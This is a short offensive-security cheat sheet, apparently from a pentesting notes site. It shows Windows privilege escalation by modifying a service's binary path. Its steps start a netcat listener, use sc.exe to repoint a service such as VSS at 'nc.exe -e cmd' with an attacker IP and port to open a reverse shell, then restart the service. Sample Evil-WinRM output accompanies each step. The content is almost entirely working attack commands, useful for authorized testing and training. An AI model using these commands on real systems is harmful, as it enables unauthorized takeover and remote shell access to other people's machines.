Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1. Modify service path
# Start a nc listener
rlwrap nc -lvnp <LOCAL_PORT>
Sample Output:
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
1. Change service path
# Assumed nc.exe is uploaded
sc.exe config <SERVICE> binpath="C:\ProgramData\nc.exe -e cmd <LOCAL_IP> <LOCAL_PORT>"
Sample Output:
*Evil-WinRM* PS C:\ProgramData> sc.exe config VSS binpath="C:\ProgramData\nc.exe -e cmd 10.10.14.44 443"
[SC] ChangeServiceConfig SUCCESS
2. Restart service
# Stop service
sc.exe stop <SERVICE>
Sample Output:
*Evil-WinRM* PS C:\windows\tasks> sc.exe stop VSS
[SC] ControlService FAILED 1062:
The service has not been started.
# Start service
sc.exe start <SERVICE>
Sample Output:
*Evil-WinRM* PS C:\windows\tasks> sc.exe start VSS
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.